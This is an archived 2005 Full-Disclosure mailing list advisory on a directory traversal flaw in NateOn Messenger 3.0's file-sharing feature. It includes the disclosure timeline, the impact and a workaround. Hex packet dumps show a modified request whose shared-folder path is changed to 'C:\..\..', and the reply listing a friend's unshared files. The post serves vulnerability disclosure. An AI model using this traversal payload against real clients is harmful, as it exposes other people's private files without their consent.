lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050712024710.A50EC960@lists.grok.org.uk>
Date: Tue Jul 12 10:43:40 2005
From: saintlinu at yahoo.co.kr (saintlinu)
Subject: NateOn Messenger Version 3.0 Directory listing
	vulnerability

Dear F/D Mailing lists

 

Title:               NateOn Messenger Version 3.0 Directory listing
vulnerability

Discoverer:        PARK, GYU TAE (saintlinu@...l2root.org)

Advisory No.:      NRVA05-02

Critical:            Less critical

Impact:            Information disclosed by unauthorized user and DoS

Where:             From remote

Operating System:  Windows Only

Solution:             patched

Workaround:         Disable fileshare function until patched by vendor

 

Notice:            06. 20. 2005 initiate - No response

                    06. 23. 2005 2ND - No response

                    06. 27. 2005 Disclosure vulnerability

                 06. 29. 2005 Secunia notify and vendor responded

                 07. 0X. 2005. Patched (I don?t know exactly patched date
bcoz vendor not inform to me)

 

Description: 

The NateOn, twenties and thirties guys famous messenger in Korea, is
Internet messenger such as MSN.

There is vulnerability in FileShare. 

When user shared some folder like a?openFolder? then registered friends
can access that folder.

Also we can access unshared folder like a?%windir%?. Because NateOn
believes user?s modified request.

 

See following detail describe:

 

Target friend id is ?buddyid=??????@...e.com?

Shared folder name is ?debug?

 

[recv] Message - ### Socket : 1088 / Content-Length : 9190

Content : 

00 20 31 20 31 39 38 0D 0A 3C 66 6F 6C 64 65 72 . 1 198..<folder

6C 69 73 74 20 6E 61 6D 65 3D 27 B3 CA B8 B8 BF list name='.....

CD 27 20 62 75 64 64 79 69 64 3D 27 XX XX XX XX .' buddyid='XXXX

XX XX 40 6E 61 74 65 2E 63 6F 6D 27 20 74 79 70 XX@...e.com' typ

65 3D 27 30 27 3E 3C 66 6F 6C 64 65 72 69 6E 66 e='0'><folderinf

6F 20 6E 61 6D 65 3D 27 2B 5F 2B 27 20 61 75 74 o name='+_+' aut

68 6F 72 69 74 79 3D 27 32 27 20 66 6F 6C 64 65 hority='2' folde

72 69 64 3D 27 30 27 20 66 6F 6C 64 65 72 70 61 rid='0' folderpa

74 68 3D 27 43 3A 5C 64 65 62 75 67 27 20 63 6F th='C:\debug' co

6D 6D 65 6E 74 3D 27 2B 5F 2B 27 20 61 64 64 64 mment='+_+' addd

61 74 65 3D 27 32 30 30 35 30 35 32 36 31 37 35 ate='20050526175

32 33 37 27 3E 3C 2F 66 6F 6C 64 65 72 69 6E 66 237'></folderinf

6F 3E 3C 2F 66 6F 6C 64 65 72 6C 69 73 74 3E 00 o></folderlist>.

00 00 00 00 00 00                               ......

 

----------------------------------------------------------------

 

We received target user?s shared folder information. 

But we can modify send packet using Win32API CraeteRemoteThread

Just substituted ?debug? to ?..\..?

 

[send] Message - ### Socket : 1088 / Content-Length : 25

Content : 

46 4C 52 4D 20 32 20 46 49 4C 45 5F 4C 49 53 54 FLRM 2 FILE_LIST

20 31 20 31 20 32 38 0D 0A                       1 1 28..

 

[send] Message - ### Socket : 1088 / Content-Length : 28

Content : 

30 20 XX XX XX XX XX XX XX XX 40 6E 61 74 65 2E 0 YYYYYYYY@...e.

63 6F 6D 20 43 3A 5C 2E 2E 5C 2E 2E             com C:\..\..

 

----------------------------------------------------------------

You can see the below messages. 

 

[recv] Message - ### Socket : 1088 / Content-Length : 9216

Content : 

00 4C 52 4D 20 31 20 46 49 4C 45 5F 4C 49 53 54 .LRM 1 FILE_LIST

20 31 20 31 20 39 38 31 0D 0A 3C 66 69 6C 65 6C  1 1 981..<filel

69 73 74 20 69 64 3D 27 XX XX XX XX XX XX 40 6E ist id='XXXXXX@n

61 74 65 2E 63 6F 6D 27 20 61 75 74 68 3D 27 32 ate.com' auth='2

27 20 70 61 74 68 3D 27 43 3A 5C 2E 2E 5C 2E 2E ' path='C:\..\..

27 20 66 6F 6C 64 65 72 69 64 3D 27 30 27 3E 3C ' folderid='0'><

66 69 6C 65 20 6E 61 6D 65 3D 27 41 55 54 4F 45 file name='AUTOE

58 45 43 2E 42 41 54 27 20 73 69 7A 65 3D 27 30 XEC.BAT' size='0

27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 2D ' date='2004-09-

31 35 20 31 36 3A 34 32 3A 30 37 27 20 69 73 66 15 16:42:07' isf

6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 older='n'/><file

20 6E 61 6D 65 3D 27 43 4F 4E 46 49 47 2E 53 59  name='CONFIG.SY

53 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65 S' size='0' date

3D 27 32 30 30 34 2D 30 39 2D 31 35 20 31 36 3A ='2004-09-15 16:

34 32 3A 30 37 27 20 69 73 66 6F 6C 64 65 72 3D 42:07' isfolder=

27 6E 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 'n'/><file name=

27 64 65 73 6B 74 6F 70 5F 61 75 64 69 74 2E 74 'desktop_audit.t

78 74 27 20 73 69 7A 65 3D 27 32 30 38 34 27 20 xt' size='2084' 

64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 34 date='2005-05-24

20 30 30 3A 32 32 3A 32 38 27 20 69 73 66 6F 6C  00:22:28' isfol

64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20 6E der='n'/><file n

61 6D 65 3D 27 64 6E 2E 76 62 73 27 20 73 69 7A ame='dn.vbs' siz

65 3D 27 33 32 34 27 20 64 61 74 65 3D 27 32 30 e='324' date='20

30 34 2D 31 30 2D 32 30 20 31 38 3A 33 31 3A 33 04-10-20 18:31:3

38 27 20 69 73 66 6F 6C 64 65 72 3D 27 6E 27 2F 8' isfolder='n'/

3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 65 64 69 ><file name='edi

2E 65 78 65 27 20 73 69 7A 65 3D 27 33 32 37 36 .exe' size='3276

38 27 20 64 61 74 65 3D 27 32 30 30 34 2D 31 30 8' date='2004-10

2D 32 30 20 31 38 3A 30 37 3A 30 35 27 20 69 73 -20 18:07:05' is

66 6F 6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C folder='n'/><fil

65 20 6E 61 6D 65 3D 27 6D 73 30 34 2D 30 33 32 e name='ms04-032

2E 77 6D 66 27 20 73 69 7A 65 3D 27 35 37 36 27 .wmf' size='576'

20 64 61 74 65 3D 27 32 30 30 34 2D 31 30 2D 32  date='2004-10-2

30 20 31 38 3A 33 33 3A 34 31 27 20 69 73 66 6F 0 18:33:41' isfo

6C 64 65 72 3D 27 6E 27 2F 3E 3C 66 69 6C 65 20 lder='n'/><file 

6E 61 6D 65 3D 27 63 6F 6E 63 65 72 74 27 20 73 name='concert' s

69 7A 65 3D 27 30 27 20 64 61 74 65 3D 27 32 30 ize='0' date='20

30 34 2D 31 30 2D 32 30 20 31 35 3A 31 32 3A 35 04-10-20 15:12:5

37 27 20 69 73 66 6F 6C 64 65 72 3D 27 79 27 2F 7' isfolder='y'/

3E 3C 66 69 6C 65 20 6E 61 6D 65 3D 27 64 65 62 ><file name='deb

75 67 27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 ug' size='0' dat

65 3D 27 32 30 30 35 2D 30 35 2D 32 33 20 31 32 e='2005-05-23 12

3A 34 38 3A 33 37 27 20 69 73 66 6F 6C 64 65 72 :48:37' isfolder

3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E 61 6D 65 ='y'/><file name

3D 27 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 ='Documents and 

53 65 74 74 69 6E 67 73 27 20 73 69 7A 65 3D 27 Settings' size='

30 27 20 64 61 74 65 3D 27 32 30 30 34 2D 30 39 0' date='2004-09

2D 31 35 20 31 37 3A 30 39 3A 31 34 27 20 69 73 -15 17:09:14' is

66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C folder='y'/><fil

65 20 6E 61 6D 65 3D 27 50 72 6F 67 72 61 6D 20 e name='Program 

46 69 6C 65 73 27 20 73 69 7A 65 3D 27 30 27 20 Files' size='0' 

64 61 74 65 3D 27 32 30 30 35 2D 30 35 2D 32 36 date='2005-05-26

20 30 38 3A 30 36 3A 31 31 27 20 69 73 66 6F 6C  08:06:11' isfol

64 65 72 3D 27 79 27 2F 3E 3C 66 69 6C 65 20 6E der='y'/><file n

61 6D 65 3D 27 74 65 73 74 27 20 73 69 7A 65 3D ame='test' size=

27 30 27 20 64 61 74 65 3D 27 32 30 30 35 2D 30 '0' date='2005-0

34 2D 32 30 20 31 34 3A 31 35 3A 34 39 27 20 69 4-20 14:15:49' i

73 66 6F 6C 64 65 72 3D 27 79 27 2F 3E 3C 66 69 sfolder='y'/><fi

6C 65 20 6E 61 6D 65 3D 27 57 49 4E 44 4F 57 53 le name='WINDOWS

27 20 73 69 7A 65 3D 27 30 27 20 64 61 74 65 3D ' size='0' date=

27 32 30 30 34 2D 31 30 2D 32 30 20 31 36 3A 30 '2004-10-20 16:0

30 3A 31 37 27 20 69 73 66 6F 6C 64 65 72 3D 27 0:17' isfolder='

79 27 2F 3E 3C 2F 66 69 6C 65 6C 69 73 74 3E 00 y'/></filelist>.

00 00 00 00 00 00                               ......

 

buddy id = YYYYYY@...e.com

Requested directory = 'C:\..\..'

File lists on unshared directory

 

<filelist id='YYYYYY@...e.com' auth='2' path='C:\..\..' folderid='0'>

<file name='AUTOEXEC.BAT'           size='0'     date='2004-09-15 16:42:07'
isfolder='n'/>

<file name='CONFIG.SYS'             size='0'     date='2004-09-15 16:42:07'
isfolder='n'/>

<file name='desktop_audit.txt'      size='2084'  date='2005-05-24 00:22:28'
isfolder='n'/>

<file name='dn.vbs'                 size='324'   date='2004-10-20 18:31:38'
isfolder='n'/>

<file name='edi.exe'                size='32768' date='2004-10-20 18:07:05'
isfolder='n'/>

<file name='ms04-032.wmf'           size='576'   date='2004-10-20 18:33:41'
isfolder='n'/>

<file name='concert'                size='0'     date='2004-10-20 15:12:57'
isfolder='y'/>

<file name='debug'                  size='0'     date='2005-05-23 12:48:37'
isfolder='y'/>

<file name='Documents and Settings' size='0'     date='2004-09-15 17:09:14'
isfolder='y'/>

<file name='Program Files'          size='0'     date='2005-05-26 08:06:11'
isfolder='y'/>

<file name='test'                   size='0'     date='2005-04-20 14:15:49'
isfolder='y'/>

<file name='WINDOWS'                size='0'     date='2004-10-20 16:00:17'
isfolder='y'/>

</filelist>.

 

---------------------[cut cut]----------------------------------------------

 

Thanks my Null@...t members

 

PS. I?m very sorry for my poor English

 

Cheers

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20050712/04693892/attachment-0001.html

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ